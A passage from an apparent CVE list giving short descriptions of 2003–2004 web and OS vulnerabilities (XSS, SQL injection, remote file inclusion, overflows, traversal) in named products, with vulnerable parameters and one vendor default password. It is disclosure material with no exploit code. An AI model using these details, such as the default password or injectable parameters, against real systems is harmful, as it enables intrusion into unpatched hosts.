earlier, and 1.5.1-cvs before 23rd October 2004, allows remote attackers to execute arbitrary web script or HTML. [CVE-2004-0942] Apache webserver 2.0.52 and earlier allows remote attackers to cause a denial of service (CPU consumption) via an HTTP GET request with a MIME header containing multiple lines with a large number of space characters. [CVE-2004-0931] MySQL MaxDB before 7.5.00.18 allows remote attackers to cause a denial of service (crash) via an HTTP request to webdbm with high ASCII values in the Server field, which triggers an assert error in the IsAscii7 function. [CVE-2004-0918] The asn_parse_header function (asn1.c) in the SNMP module for Squid Web Proxy Cache before 2.4.STABLE7 allows remote attackers to cause a denial of service (server restart) via certain SNMP packets with negative length fields that trigger a memory allocation error. [CVE-2004-0901] Microsoft Word for Windows 6.0 Converter (MSWRD632.WPC), as used in WordPad, does not properly validate certain data lengths, which allows remote attackers to execute arbitrary code via a .wri, .rtf, and .doc file sent by email or malicious web site, aka "Font Conversion Vulnerability," a different vulnerability than CVE-2004-0571. [CVE-2004-0893] The Local Procedure Call (LPC) interface of the Windows Kernel for Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 does not properly validate the lengths of messages sent to the LPC port, which allows local users to gain privileges, aka "Windows Kernel Vulnerability." [CVE-2004-0892] Microsoft Proxy Server 2.0 and Microsoft ISA Server 2000 (which is included in Small Business Server 2000 and Small Business Server 2003 Premium Edition) allows remote attackers to spoof trusted Internet content on a specially crafted webpage via spoofed reverse DNS lookup results. [CVE-2004-0875] Multiple cross-site scripting (XSS) vulnerabilities in Phpgroupware (aka webdistro) 0.9.16.002 and earlier allow remote attackers to insert arbitrary HTML or web script, as demonstrated with a request to the wiki module. [CVE-2004-0867] Mozilla Firefox 0.9.2 allows web sites to set cookies for country-specific top-level domains, such as .ltd.uk, .plc.uk, and .sch.uk, which could allow remote attackers to perform a session fixation attack and hijack a user's HTTP session. NOTE: it was later reported that 2.x is also affected. [CVE-2004-0866] Internet Explorer 6.0 allows web sites to set cookies for country-specific top-level domains, such as .ltd.uk, .plc.uk, and .sch.uk, which could allow remote attackers to perform a session fixation attack and hijack a user's HTTP session. [CVE-2004-0845] Internet Explorer 5.01, 5.5, and 6 does not properly cache SSL content, which allows remote attackers to obtain information or spoof content via a web site with the same host name as the target web site, whose content is cached and reused when the user visits the target web site. [CVE-2004-0844] Internet Explorer 6 on Double Byte Character Set (DBCS) systems allows remote attackers to alter displayed address bars and spoof web pages via a URL containing special characters, facilitating phishing attacks, aka the "Address Bar Spoofing on Double Byte Character Set Systems Vulnerability." [CVE-2004-0843] Internet Explorer 5.5 and 6 does not properly handle plug-in navigation, which allows remote attackers to alter displayed address bars and thereby spoof web pages, facilitating phishing attacks, aka the "Plug-in Navigation Address Bar Spoofing Vulnerability." [CVE-2004-0839] Internet Explorer in Windows XP SP2, and other versions including 5.01 and 5.5, allows remote attackers to install arbitrary programs via a web page that uses certain styles and the AnchorClick behavior, popup windows, and drag-and-drop capabilities to drop the program in the local startup folder, as demonstrated by "wottapoop.html". [CVE-2004-0814] Multiple race conditions in the terminal layer in Linux 2.4.x, and 2.6.x before 2.6.9, allow (1) local users to obtain portions of kernel data via a TIOCSETD ioctl call to a terminal interface that is being accessed by another thread, or (2) remote attackers to cause a denial of service (panic) by switching from console to PPP line discipline, then quickly sending data that is received during the switch. [CVE-2004-0809] The mod_dav module in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (child process crash) via a certain sequence of LOCK requests for a location that allows WebDAV authoring access. [CVE-2004-0787] Cross-site scripting (XSS) vulnerability in the web frontend in OpenCA 0.9.1-8 and earlier, and 0.9.2 RC6 and earlier, allows remote attackers to inject arbitrary web script or HTML via the form input fields. [CVE-2004-0781] Cross-site scripting (XSS) vulnerability in list.cgi in the Icecast internal web server (icecast-server) 1.3.12 and earlier allows remote attackers to inject arbitrary web script via the UserAgent parameter. [CVE-2004-0779] The (1) Mozilla 1.6, (2) Firebird 0.7 and (3) Firefox 0.8 web browsers do not properly verify that cached passwords for SSL encrypted sites are only sent via SSL encrypted sessions to the site, which allows a remote attacker to cause a cached password to be sent in cleartext to a spoofed site. [CVE-2004-0763] Mozilla Firefox 0.9.1 and 0.9.2 allows remote web sites to spoof certificates of trusted web sites via redirects and Javascript that uses the "onunload" method. [CVE-2004-0762] Mozilla before 1.7, Firefox before 0.9, and Thunderbird before 0.7, allow remote web sites to install arbitrary extensions by using interactive events to manipulate the XPInstall Security dialog box. [CVE-2004-0761] Mozilla before 1.7, Firefox before 0.9, and Thunderbird before 0.7, allow remote attackers to use certain redirect sequences to spoof the security lock icon that makes a web page appear to be encrypted. [CVE-2004-0759] Mozilla before 1.7 allows remote web servers to read arbitrary files via Javascript that sets the value of an <input type="file"> tag. [CVE-2004-0746] Konqueror in KDE 3.2.3 and earlier allows web sites to set cookies for country-specific top-level domains, such as .ltd.uk, .plc.uk and .firm.in, which could allow remote attackers to perform a session fixation attack and hijack a user's HTTP session. [CVE-2004-0737] Multiple cross-site scripting vulnerabilities in index.php in the Search module for Php-Nuke allows remote attackers to inject arbitrary web script or HTML via the (1) sid, (2) max, (3) sel1, (4) sel2, (5) sel3, (6) sel4, (7) sel5, (8) match, (9) mod1, (10) mod2, or (11) mod3 parameters. [CVE-2004-0734] Web_Store.cgi allows remote attackers to execute arbitrary commands via shell metacharacters in the page parameter. [CVE-2004-0730] Multiple cross-site scripting (XSS) vulnerabilities in PhpBB 2.0.8 allow remote attackers to inject arbitrary web script or HTML via (1) the cat_title parameter in index.php, (2) the faq[0][0] parameter in lang_faq.php as accessible from faq.php, or (3) the faq[0][0] parameter in lang_bbcode.php as accessible from faq.php. [CVE-2004-0727] Microsoft Internet Explorer 6.0.2800.1106 on Microsoft Windows XP SP2, and other versions including 5.01 and 5.5, allows remote web servers to bypass zone restrictions and execute arbitrary code in the local computer zone by redirecting a function to another function with the same name, as demonstrated by SimilarMethodNameRedir, aka the "Similar Method Name Redirection Cross Domain Vulnerability." [CVE-2004-0725] Cross-site scripting (XSS) vulnerability in help.php in Moodle 1.3.2 and 1.4 dev allows remote attackers to inject arbitrary web script or HTML via the file parameter. [CVE-2004-0721] Konqueror 3.1.3, 3.2.2, and possibly other versions does not properly prevent a frame in one domain from injecting content into a frame that belongs to another domain, which facilitates web site spoofing and other attacks, aka the frame injection vulnerability. [CVE-2004-0720] Safari 1.2.2 does not properly prevent a frame in one domain from injecting content into a frame that belongs to another domain, which facilitates web site spoofing and other attacks, aka the frame injection vulnerability. [CVE-2004-0719] Internet Explorer for Mac 5.2.3, Internet Explorer 6 on Windows XP, and possibly other versions, does not properly prevent a frame in one domain from injecting content into a frame that belongs to another domain, which facilitates web site spoofing and other attacks, aka the frame injection vulnerability. [CVE-2004-0718] The (1) Mozilla 1.6, (2) Firebird 0.7, (3) Firefox 0.8, and (4) Netscape 7.1 web browsers do not properly prevent a frame in one domain from injecting content into a frame that belongs to another domain, which facilitates web site spoofing and other attacks, aka the frame injection vulnerability. [CVE-2004-0717] Opera 7.51 for Windows and 7.50 for Linux does not properly prevent a frame in one domain from injecting content into a frame that belongs to another domain, which facilitates web site spoofing and other attacks, aka the frame injection vulnerability. [CVE-2004-0715] The WebLogic Authentication provider for BEA WebLogic Server and WebLogic Express 8.1 through SP2 and 7.0 through SP4 does not properly clear member relationships when a group is deleted, which can cause a new group with the same name to have the members of the old group, which allows group members to gain privileges. [CVE-2004-0713] The remove method in a stateful Enterprise JavaBean (EJB) in BEA WebLogic Server and WebLogic Express version 8.1 through SP2, 7.0 through SP4, and 6.1 through SP6, does not properly check EJB permissions before unexporting a bean, which allows remote authenticated users to remove EJB objects from remote views before the security exception is thrown. [CVE-2004-0712] The configuration tools (1) config.sh in Unix or (2) config.cmd in Windows for BEA WebLogic Server 8.1 through SP2 create a log file that contains the administrative username and password in cleartext, which could allow local users to gain privileges. [CVE-2004-0711] The URL pattern matching feature in BEA WebLogic Server 6.x matches illegal patterns ending in "" as wildcards as if they were the legal "/" pattern, which could cause WebLogic 7.x to allow remote attackers to bypass intended access restrictions because the illegal patterns are properly rejected. [CVE-2004-0706] Bugzilla 2.17.5 through 2.17.7 embeds the password in an image URL, which could allow local users to view the password in the web server log files. [CVE-2004-0698] 4D WebSTAR 5.3.2 and earlier allows local users to read and modify arbitrary files via a symlink attack. [CVE-2004-0697] Unknown vulnerability in 4D WebSTAR 5.3.2 and earlier allows remote attackers to read the php.ini configuration file and possibly obtain sensitive information. [CVE-2004-0696] The ShellExample.cgi script in 4D WebSTAR 5.3.2 and earlier allows remote attackers to list arbitrary directories via a URL with the desired path and a "" (asterisk) character. [CVE-2004-0695] Stack-based buffer overflow in the FTP service for 4D WebSTAR 5.3.2 and earlier allows remote attackers to execute arbitrary code via a long FTP command. [CVE-2004-0684] WebSphere Edge Component Caching Proxy in WebSphere Edge Server 5.02, with the JunctionRewrite directive enabled, allows remote attackers to cause a denial of service via an HTTP GET request without any parameters. [CVE-2004-0681] Multiple cross-site scripting (XSS) vulnerabilities in (1) comersus_customerAuthenticateForm.asp, (2) comersus_backoffice_message.asp, (3) comersus_supportError.asp, or (4) comersus_message.asp in Comersus Cart 5.09 allow remote attackers to execute web script as other users via the message parameter. [CVE-2004-0680] Zoom X3 ADSL modem has a terminal running on port 254 that can be accessed using the default HTML management password, even if the password has been changed for the HTTP interface, which could allow remote attackers to gain unauthorized access. [CVE-2004-0676] Directory traversal vulnerability in Fastream NETFile FTP/Web Server 6.7.2.1085 and earlier allows remote attackers to create or delete arbitrary files via .. (dot dot) and // (double slash) sequences in the filename parameter. [CVE-2004-0675] Cross-site scripting (XSS) vulnerability in (1) cart32.exe or (2) c32web.exe in Cart32 shopping cart allows remote attackers to execute arbitrary web script via the cart32 parameter to a GetLatestBuilds command. [CVE-2004-0673] Cross-site scripting (XSS) vulnerability in SCI Photo Chat Server 3.4.9 allows remote attackers to execute arbitrary web script as other users via an invalid request that is echoed in the resulting error message. [CVE-2004-0668] Web Access in Lotus Domino 6.5.1 allows remote attackers to cause a denial of service (server crash) via a large e-mail message, as demonstrated using a large image attachment. [CVE-2004-0665] csFAQ.cgi in csFAQ allows remote attackers to gain sensitive information via an invalid database parameter, which reveals the path to the web server in an error message. [CVE-2004-0652] BEA WebLogic Server and WebLogic Express 7.0 through 7.0 Service Pack 4, and 8.1 through 8.1 Service Pack 2, allows attackers to obtain the username and password for booting the server by directly accessing certain internal methods. [CVE-2004-0646] Buffer overflow in the WriteToLog function for JRun 3.0 through 4.0 web server connectors, such as (1) mod_jrun and (2) mod_jrun20 for Apache, with verbose logging enabled, allows remote attackers to execute arbitrary code via a long HTTP header Content-Type field or other fields. [CVE-2004-0625] SQL injection vulnerability in Infinity WEB 1.0 allows remote attackers to bypass authentication and gain privileges via the login page. [CVE-2004-0624] PHP remote file inclusion vulnerability in index.php for Artmedic links 5.0 (artmedic_links5) allows remote attackers to execute arbitrary PHP code by modifying the id parameter to reference a URL on a remote web server that contains the code. [CVE-2004-0617] Cross-site scripting (XSS) vulnerability in ArbitroWeb 0.6 allows remote attackers to inject arbitrary script or HTML via the rawURL parameter. [CVE-2004-0611] Web-Based Administration in Netgear FVS318 VPN Router allows remote attackers to cause a denial of service (no new connections) via a large number of open HTTP connections. [CVE-2004-0600] Buffer overflow in the Samba Web Administration Tool (SWAT) in Samba 3.0.2 to 3.0.4 allows remote attackers to execute arbitrary code via an invalid base-64 character during HTTP basic authentication. [CVE-2004-0596] The Equalizer Load-balancer for serial network interfaces (eql.c) in Linux kernel 2.6.x up to 2.6.7 allows local users to cause a denial of service via a non-existent device name that triggers a null dereference. [CVE-2004-0595] The strip_tags function in PHP 4.x up to 4.3.7, and 5.x up to 5.0.0RC3, does not filter null (\0) characters within tag names when restricting input to allowed tags, which allows dangerous tags to be processed by web browsers such as Internet Explorer and Safari, which ignore null characters and facilitate the exploitation of cross-site scripting (XSS) vulnerabilities. [CVE-2004-0591] Cross-site scripting (XSS) vulnerability in the print_header_uc function for SqWebMail 4.0.4 and earlier, and possibly 3.x, allows remote attackers to inject arbitrary web script or HRML via (1) e-mail headers or (2) a message with a "message/delivery-status" MIME Content-Type. [CVE-2004-0588] Cross-site scripting (XSS) vulnerability in the web mail module for Usermin 1.070 allows remote attackers to insert arbitrary HTML and script via e-mail messages. [CVE-2004-0583] The account lockout functionality in (1) Webmin 1.140 and (2) Usermin 1.070 does not parse certain character strings, which allows remote attackers to conduct a brute force attack to guess user IDs and passwords. [CVE-2004-0582] Unknown vulnerability in Webmin 1.140 allows remote attackers to bypass access control rules and gain read access to configuration information for a module. [CVE-2004-0573] Buffer overflow in the converter for Microsoft WordPerfect 5.x on Office 2000, Office XP, Office 2003, and Works Suites 2001 through 2004 allows remote attackers to execute arbitrary code via a malicious document or website. [CVE-2004-0571] Microsoft Word for Windows 6.0 Converter does not properly validate certain data lengths, which allows remote attackers to execute arbitrary code via a .wri, .rtf, and .doc file sent by email or malicious web site, aka "Table Conversion Vulnerability," a different vulnerability than CVE-2004-0901. [CVE-2004-0568] HyperTerminal application for Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 does not properly validate the length of a value that is saved in a session file, which allows remote attackers to execute arbitrary code via a malicious HyperTerminal session file (.ht), web site, or Telnet URL contained in an e-mail message, triggering a buffer overflow. [CVE-2004-0549] The WebBrowser ActiveX control, or the Internet Explorer HTML rendering engine (MSHTML), as used in Internet Explorer 6, allows remote attackers to execute arbitrary code in the Local Security context by using the showModalDialog method and modifying the location to execute code such as Javascript, as demonstrated using (1) delayed HTTP redirect operations, and an HTTP response with a Location: header containing a "URL:" prepended to a "ms-its" protocol URI, or (2) modifying the location attribute of the window, as exploited by the Download.ject (aka Scob aka Toofer) using the ADODB.Stream object. [CVE-2004-0541] Buffer overflow in the ntlm_check_auth (NTLM authentication) function for Squid Web Proxy Cache 2.5.x and 3.x, when compiled with NTLM handlers enabled, allows remote attackers to execute arbitrary code via a long password ("pass" variable). [CVE-2004-0539] The "Show in Finder" button in the Safari web browser in Mac OS X 10.3.4 and 10.2.8 may execute downloaded applications, which could allow remote attackers to execute arbitrary code. [CVE-2004-0537] Opera 7.50 and earlier allows remote web sites to provide a "Shortcut Icon" (favicon) that is wider than expected, which could allow the web sites to spoof a trusted domain and facilitate phishing attacks using a wide icon and extra spaces. [CVE-2004-0534] Cross-site scripting (XSS) vulnerability in Business Objects InfoView 5.1.4 through 5.1.8 for WebIntelligence 2.7.0 through 2.7.4 allows remote attackers to inject arbitrary web script or HTML via document names when uploading a document. [CVE-2004-0533] Business Objects WebIntelligence 2.7.0 through 2.7.4 only enforces access controls on the client, which allows remote authenticated users to delete arbitrary files on the server via a crafted delete request using the InfoView web client. [CVE-2004-0486] HelpViewer in Mac OS X 10.3.3 and 10.2.8 processes scripts that it did not initiate, which can allow attackers to execute arbitrary code, an issue that was originally reported as a directory traversal vulnerability in the Safari web browser using the runscript parameter in a help: URI handler. [CVE-2004-0471] BEA WebLogic Server and WebLogic Express 7.0 through SP5 and 8.1 through SP2 does not enforce site restrictions for starting and stopping servers for users in the Admin and Operator security roles, which allows unauthorized users to cause a denial of service (service shutdown). [CVE-2004-0470] BEA WebLogic Server and WebLogic Express 7.0 through SP5 and 8.1 through SP2, when editing weblogic.xml using WebLogic Builder or the SecurityRoleAssignmentMBean.toXML method, inadvertently removes security-role-assignment tags when weblogic.xml does not have a principal-name tag, which can remove intended access restrictions for the associated web application. [CVE-2004-0466] WebConnect 6.5, 6.4.4, and possibly earlier versions allows remote attackers to cause a denial of service (hang) via a URL containing an MS-DOS device name such as (1) AUX, (2) CON, (3) PRN, (4) COM1, or (5) LPT1. [CVE-2004-0465] Directory traversal vulnerability in jretest.html in WebConnect 6.5 and 6.4.4, and possibly earlier versions, allows remote attackers to read keys within arbitrary INI formatted files via "..//" sequences in the WCP_USER parameter. [CVE-2004-0462] The built-in web servers for multiple networking devices do not set the Secure attribute for sensitive cookies in HTTPS sessions, which could cause the user agent to send those cookies in plaintext over an HTTP session with the same server. [CVE-2004-0456] Stack-based buffer overflow in pavuk 0.9pl28, 0.9pl27, and possibly other versions allows remote web sites to execute arbitrary code via a long HTTP Location header. [CVE-2004-0455] Buffer overflow in cgi.c in www-sql before 0.5.7 allows local users to execute arbitrary code via a web page that is processed by www-sql. [CVE-2004-0398] Heap-based buffer overflow in the ne_rfc1036_parse date parsing function for the neon library (libneon) 0.24.5 and earlier, as used by cadaver before 0.22, allows remote WebDAV servers to execute arbitrary code on the client. [CVE-2004-0385] Heap-based buffer overflow in Oracle 9i Application Server Web Cache 9.0.4.0.0, 9.0.3.1.0, 9.0.2.3.0, and 9.0.0.4.0 allows remote attackers to execute arbitrary code via a long HTTP request method header to the Web Cache listener. NOTE: due to the vagueness of the Oracle advisory, it is not clear whether there are additional issues besides this overflow, although the advisory alludes to multiple "vulnerabilities." [CVE-2004-0379] Multiple cross-site scripting (XSS) vulnerabilities in Microsoft SharePoint Portal Server 2001 allow remote attackers to process arbitrary web content and steal cookies via certain server scripts. [CVE-2004-0352] Cisco 11000 Series Content Services Switches (CSS) running WebNS 5.0(x) before 05.0(04.07)S, and 6.10(x) before 06.10(02.05)S allow remote attackers to cause a denial of service (device reset) via a malformed packet to UDP port 5002. [CVE-2004-0349] Directory traversal vulnerability in GWeb HTTP Server 0.6 allows remote attackers to view arbitrary files via a .. (dot dot) in the URL. [CVE-2004-0337] Cross-site scripting (XSS) vulnerability in LAN SUITE Web Mail 602Pro allows remote attackers to execute arbitrary script or HTML as other users via a URL to index.html, followed by a / (slash) and the desired script. NOTE: the vendor states that this bug could not be reproduced, so this issue may be REJECTed in the future. [CVE-2004-0336] LAN SUITE Web Mail 602Pro allows remote attackers to gain sensitive information via the mail login form, which contains the path to the mail directory. [CVE-2004-0335] LAN SUITE Web Mail 602Pro, when configured to use the "Directory browsing" feature, allows remote attackers to obtain a directory listing via an HTTP request to (1) index.html, (2) cgi-bin/, or (3) users/. [CVE-2004-0331] Heap-based buffer overflow in Dell OpenManage Web Server 3.4.0 allows remote attackers to cause a denial of service (crash) via a HTTP POST with a long application variable. [CVE-2004-0326] Buffer overflow in the web proxy for GateKeeper Pro 4.7 allows remote attackers to execute arbitrary code via a long GET request. [CVE-2004-0314] Cross-site scripting (XSS) vulnerability in done.jsp in WebzEdit 1.9 and earlier allows remote attackers to execute arbitrary script as other users via the message parameter. [CVE-2004-0311] American Power Conversion (APC) Web/SNMP Management SmartSlot Card 3.0 through 3.0.3 and 3.21 are shipped with a default password of TENmanUFactOryPOWER, which allows remote attackers to gain unauthorized access. [CVE-2004-0305] Cross-site scripting (XSS) vulnerability in error.asp in WebCortex WebStores 2000 6.0 allows remote attackers to execute arbitrary script as other users and steal session IDs via the Message_id parameter. [CVE-2004-0304] SQL injection vulnerability in browse_items.asp in WebCortex WebStores 2000 6.0 allows remote attackers to gain unauthorized access and execute arbitrary commands via the Search_Text parameter. [CVE-2004-0284] Microsoft Internet Explorer 6.0, Outlook 2002, and Outlook 2003 allow remote attackers to cause a denial of service (CPU consumption), if "Do not save encrypted pages to disk" is disabled, via a web site or HTML e-mail that contains two null characters (%00) after the host name. [CVE-2004-0281] Caucho Technology Resin 2.1.12 allows remote attackers to gain sensitive information and view the contents of the /WEB-INF/ directory via an HTTP request for "WEB-INF..", which is equivalent to "WEB-INF" in Windows. [CVE-2004-0272] SQL injection vulnerability in MaxWebPortal allows remote attackers to inject arbitrary SQL code and gain sensitive information via the SendTo parameter in Personal Messages. [CVE-2004-0271] Multiple cross-site scripting vulnerabilities (XSS) in MaxWebPortal allow remote attackers to execute arbitrary web script as other users via (1) the sub_name parameter of dl_showall.asp, (2) the SendTo parameter in Personal Messages, (3) the HTTP_REFERER for down.asp, or (4) the image name of an Avatar in the register form. [CVE-2004-0269] SQL injection vulnerability in PHP-Nuke 6.9 and earlier, and possibly 7.x, allows remote attackers to inject arbitrary SQL code and gain sensitive information via (1) the category variable in the Search module or (2) the admin variable in the Web_Links module. [CVE-2004-0259] The check_referer() function in Formmail.php 5.0 and earlier allows remote attackers to bypass access restrictions via an empty or spoofed HTTP Referer, as demonstrated using an application on the same web server that contains a cross-site scripting (XSS) issue. [CVE-2004-0245] Web Crossing 4.x and 5.x allows remote attackers to cause a denial of service (crash) by sending a HTTP POST request with a large or negative Content-Length, which causes an integer divide-by-zero. [CVE-2004-0224] Multiple buffer overflows in (1) iso2022jp.c or (2) shiftjis.c for Courier-IMAP before 3.0.0, Courier before 0.45, and SqWebMail before 4.0.0 may allow remote attackers to execute arbitrary code "when Unicode character is out of BMP range." [CVE-2004-0216] Integer overflow in the Install Engine (inseng.dll) for Internet Explorer 5.01, 5.5, and 6 allows remote attackers to execute arbitrary code via a malicious website or HTML email with a long .CAB file name, which triggers the integer overflow when calculating a buffer length and leads to a heap-based buffer overflow. [CVE-2004-0207] "Shatter" style vulnerability in the Window Management application programming interface (API) for Microsoft Windows 98, Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows local users to gain privileges by using certain API functions to change properties of privileged programs using the SetWindowLong and SetWIndowLongPtr API functions. [CVE-2004-0204] Directory traversal vulnerability in the web viewers for Business Objects Crystal Reports 9 and 10, and Crystal Enterprise 9 or 10, as used in Visual Studio .NET 2003 and Outlook 2003 with Business Contact Manager, Microsoft Business Solutions CRM 1.2, and other products, allows remote attackers to read and delete arbitrary files via ".." sequences in the dynamicimag argument to crystalimagehandler.aspx. [CVE-2004-0203] Cross-site scripting (XSS) vulnerability in Outlook Web Access for Exchange Server 5.5 Service Pack 4 allows remote attackers to insert arbitrary script and spoof content in HTML email or web caches via an HTML redirect query. [CVE-2004-0202] IDirectPlay4 Application Programming Interface (API) of Microsoft DirectPlay 7.0a thru 9.0b, as used in Windows Server 2003 and earlier allows remote attackers to cause a denial of service (application crash) via a malformed packet. [CVE-2004-0200] Buffer overflow in the JPEG (JPG) parsing engine in the Microsoft Graphic Device Interface Plus (GDI+) component, GDIPlus.dll, allows remote attackers to execute arbitrary code via a JPEG image with a small JPEG COM field length that is normalized to a large integer length before a memory copy operation. [CVE-2004-0179] Multiple format string vulnerabilities in (1) neon 0.24.4 and earlier, and other products that use neon including (2) Cadaver, (3) Subversion, and (4) OpenOffice, allow remote malicious WebDAV servers to execute arbitrary code. [CVE-2004-0166] Unknown vulnerability in Safari web browser for Mac OS X 10.2.8 related to "the display of URLs in the status bar." [CVE-2004-0132] Multiple PHP remote file inclusion vulnerabilities in ezContents 2.0.2 and earlier allow remote attackers to execute arbitrary PHP code from a remote web server, as demonstrated using (1) the GLOBALS[rootdp] parameter to db.php, or (2) the GLOBALS[language_home] parameter to archivednews.php, and a malicious version of lang_admin.php. [CVE-2004-0128] PHP remote file inclusion vulnerability in the GEDCOM configuration script for phpGedView 2.65.1 and earlier allows remote attackers to execute arbitrary PHP code by modifying the PGV_BASE_DIRECTORY parameter to reference a URL on a remote web server that contains a malicious theme.php script. [CVE-2004-0124] The DCOM RPC interface for Microsoft Windows NT 4.0, 2000, XP, and Server 2003 allows remote attackers to cause network communications via an "alter context" call that contains additional data, aka the "Object Identity Vulnerability." [CVE-2004-0119] The Negotiate Security Software Provider (SSP) interface in Windows 2000, Windows XP, and Windows Server 2003, allows remote attackers to cause a denial of service (crash from null dereference) or execute arbitrary code via a crafted SPNEGO NegTokenInit request during authentication protocol selection. [CVE-2004-0114] The shmat system call in the System V Shared Memory interface for FreeBSD 5.2 and earlier, NetBSD 1.3 and earlier, and OpenBSD 2.6 and earlier, does not properly decrement a shared memory segment's reference count when the vm_map_find function fails, which could allow local users to gain read or write access to a portion of kernel memory and gain privileges. [CVE-2004-0092] Unknown vulnerability in Safari web browser in Mac OS X 10.2.8 and 10.3.2, with unknown impact. [CVE-2004-0091] * DISPUTED ** NOTE: this issue has been disputed by the vendor. Cross-site scripting (XSS) vulnerability in register.php for unknown versions of vBulletin allows remote attackers to inject arbitrary HTML or web script via the reg_site (or possibly regsite) parameter. NOTE: the vendor has disputed this issue, saying "There is no hidden field called 'reg_site', nor any $reg_site variable anywhere in the vBulletin 2 or vBulletin 3 source code or templates, nor has it ever existed. We can only assume that this vulnerability was found in a site running code modified from that supplied by Jelsoft." [CVE-2004-0073] PHP remote file inclusion vulnerability in (1) config.php and (2) config_page.php for EasyDynamicPages 2.0 allows remote attackers to execute arbitrary PHP code by modifying the edp_relative_path parameter to reference a URL on a remote web server that contains a malicious serverdata.php script. [CVE-2004-0070] PHP remote file inclusion vulnerability in module.php for ezContents allows remote attackers to execute arbitrary PHP code by modifying the link parameter to reference a URL on a remote web server that contains the code. [CVE-2004-0068] PHP remote file inclusion vulnerability in config.php for PhpDig 1.6.5 and earlier allows remote attackers to execute arbitrary PHP code by modifying the $relative_script_path parameter to reference a URL on a remote web server that contains the code. [CVE-2004-0066] phpGedView before 2.65 allows remote attackers to obtain the absolute path of the web server via malformed parameters to (1) indilist.php, (2) famlist.php, (3) placelist.php, (4) imageview.php, (5) timeline.php, (6) clippings.php, (7) login.php, and (8) gdbi.php. [CVE-2004-0050] Verity Ultraseek before 5.2.2 allows remote attackers to obtain the full pathname of the document root via an MS-DOS device name in the web search option, such as (1) NUL, (2) CON, (3) AUX, (4) COM1, (5) COM2, and others. [CVE-2004-0046] Cross-site scripting (XSS) vulnerability in SnapStream PVS LITE allows remote attackers to inject arbitrary web script or HTML via a GET request containing a terminating '"' (double quote) character. [CVE-2004-0034] Multiple cross-site scripting (XSS) vulnerabilities in Phorum 3.4.5 and earlier allow remote attackers to inject arbitrary HTML or web script via (1) the phorum_check_xss function in common.php, (2) the EditError variable in profile.php, and (3) the Error variable in login.php. [CVE-2004-0032] Cross-site scripting (XSS) vulnerability in search.php in PHPGEDVIEW 2.61 allows remote attackers to inject arbitrary HTML and web script via the firstname parameter. [CVE-2004-0030] PHP remote file inclusion vulnerability in (1) functions.php, (2) authentication_index.php, and (3) config_gedcom.php for PHPGEDVIEW 2.61 allows remote attackers to execute arbitrary PHP code by modifying the PGV_BASE_DIRECTORY parameter to reference a URL on a remote web server that contains the code. [CVE-2004-0006] Multiple buffer overflows in Gaim 0.75 and earlier, and Ultramagnetic before 0.81, allow remote attackers to cause a denial of service and possibly execute arbitrary code via (1) cookies in a Yahoo web connection, (2) a long name parameter in the Yahoo login web page, (3) a long value parameter in the Yahoo login page, (4) a YMSG packet, (5) the URL parser, and (6) HTTP proxy connect. [CVE-2003-1590] Unspecified vulnerability in Sun ONE (aka iPlanet) Web Server 6.0 SP3 through SP5 on Windows allows remote attackers to cause a denial of service (daemon crash) via unknown vectors. [CVE-2003-1589] Unspecified vulnerability in Sun ONE (aka iPlanet) Web Server 4.1 before SP13 and 6.0 before SP6 on Windows allows attackers to cause a denial of service (daemon crash) via unknown vectors. [CVE-2003-1587] Cross-site scripting (XSS) vulnerability in LoganPro allows remote attackers to inject arbitrary web script or HTML via a crafted User-Agent HTTP header. [CVE-2003-1586] Cross-site scripting (XSS) vulnerability in WebExpert allows remote attackers to inject arbitrary web script or HTML via a crafted User-Agent HTTP header. [CVE-2003-1585] Cross-site scripting (XSS) vulnerability in WebLogExpert allows remote attackers to inject arbitrary web script or HTML via a crafted client domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue. [CVE-2003-1584] Cross-site scripting (XSS) vulnerability in SurfStats allows remote attackers to inject arbitrary web script or HTML via a crafted client domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue. [CVE-2003-1583] Cross-site scripting (XSS) vulnerability in WebTrends allows remote attackers to inject arbitrary web script or HTML via a crafted client domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue. [CVE-2003-1579] Sun ONE (aka iPlanet) Web Server 6 on Windows, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue. [CVE-2003-1578] Sun ONE (aka iPlanet) Web Server 4.1 through SP12 and 6.0 through SP5, when DNS resolution is enabled for client IP addresses, allows remote attackers to hide HTTP requests from the log-preview functionality by accompanying the requests with crafted DNS responses specifying a domain name beginning with a "format=" substring, related to an "Inverse Lookup Log Corruption (ILLC)" issue. [CVE-2003-1577] Sun ONE (aka iPlanet) Web Server 4.1 through SP12 and 6.0 through SP5, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files, and conduct cross-site scripting (XSS) attacks involving the iPlanet Log Analyzer, via an HTTP request in conjunction with a crafted DNS response, related to an "Inverse Lookup Log Corruption (ILLC)" issue, a different vulnerability than CVE-2002-1315 and CVE-2002-1316. [CVE-2003-1571] Web Wiz Guestbook 6.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the database and obtain sensitive information via a direct request for database/WWGguestbook.mdb. NOTE: it was later reported that 8.21 is also affected. [CVE-2003-1569] GoAhead WebServer before 2.1.5 on Windows 95, 98, and ME allows remote attackers to cause a denial of service (daemon crash) via an HTTP request with a (1) con, (2) nul, (3) clock$, or (4) config$ device name in a path component, different vectors than CVE-2001-0385. [CVE-2003-1568] GoAhead WebServer before 2.1.6 allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via an invalid URL, related to the websSafeUrl function. [CVE-2003-1556] Cross-site scripting (XSS) vulnerability in cc_guestbook.pl in CGI City CC GuestBook allows remote attackers to inject arbitrary web script or HTML via the (1) name and (2) homepage_title (webpage title) parameters. [CVE-2003-1554] Cross-site scripting (XSS) vulnerability in scozbook/add.php in ScozNet ScozBook 1.1 BETA allows remote attackers to inject arbitrary web script or HTML via the (1) username, (2) useremail, (3) aim, (4) msn, (5) sitename and (6) siteaddy variables. [CVE-2003-1553] Haakon Nilsen Simple Internet Publishing System (SIPS) 0.2.2 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain password and other user information via a 